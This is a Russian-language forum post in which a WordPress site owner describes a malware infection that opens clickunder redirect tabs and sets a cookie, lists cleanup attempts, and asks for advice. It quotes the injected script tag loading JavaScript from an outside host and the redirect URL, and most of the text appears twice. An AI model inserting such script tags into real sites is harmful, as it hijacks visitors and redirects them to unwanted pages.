Добрый день,
возникла проблема, бьюсь уже не первую неделю. Есть сайт, собран на wordpress, лежит на хостинге. Адрес effectifs . ru
Саппорт провайдера начал слать письма о зараженных php-файлах. Файлы были прочесаны и вычищены.
Однако, на сайте сидит вирус, который редиректит на не легитимные страницы и сидит где-то в javascript-файлах.
Логика вируса такая: приходим первый раз на страницу(Контакты,Соискатель и тп), при нажатии на любое место страницы, открывается новая вкладка с переходом сначала на
, затем на aliexpress, при этом записывается кука на сутки(название clickunder), сутки живем спокойно, ну или чистим куки и снова ловим переход).
В общем, я уже голову сломал, как его найти.
Было сделано(кроме прогона антивирусниками файлов сайта):
1. Замена темы - результат тот же.
2. Замена wordpress - скачал на сервер чистый wordpress, скопировал wp-config.php и wp-content - результат тот же
3. Заглянул в базу - там очень много левых табличек (с названиями от используемой темы), как там наводить ревизию пока не представляю.
4. Нашел js со стороннего хоста, который делает редирект и записывает куку.
на странице сайта (например контакты) есть строчка
в исходном коде, её конечно нет. как найти, что её генерит, пока не знаю.
В общем, буду рад любым советам, так как уже не знаю в каком направлении двигаться.
возникла проблема, бьюсь уже не первую неделю. Есть сайт, собран на wordpress, лежит на хостинге. Адрес effectifs . ru
Саппорт провайдера начал слать письма о зараженных php-файлах. Файлы были прочесаны и вычищены.
Однако, на сайте сидит вирус, который редиректит на не легитимные страницы и сидит где-то в javascript-файлах.
Логика вируса такая: приходим первый раз на страницу(Контакты,Соискатель и тп), при нажатии на любое место страницы, открывается новая вкладка с переходом сначала на
Код:
http://googleframe.net/tijaq.cgi?18В общем, я уже голову сломал, как его найти.
Было сделано(кроме прогона антивирусниками файлов сайта):
1. Замена темы - результат тот же.
2. Замена wordpress - скачал на сервер чистый wordpress, скопировал wp-config.php и wp-content - результат тот же
3. Заглянул в базу - там очень много левых табличек (с названиями от используемой темы), как там наводить ревизию пока не представляю.
4. Нашел js со стороннего хоста, который делает редирект и записывает куку.
на странице сайта (например контакты) есть строчка
HTML:
<p><script type='text/javascript' src='http://online-sale24.com/1.js'></script><script type='text/javascript' src='http://online-sale24.com/1.js'></script></p>в исходном коде, её конечно нет. как найти, что её генерит, пока не знаю.
В общем, буду рад любым советам, так как уже не знаю в каком направлении двигаться.
Последнее редактирование модератором:
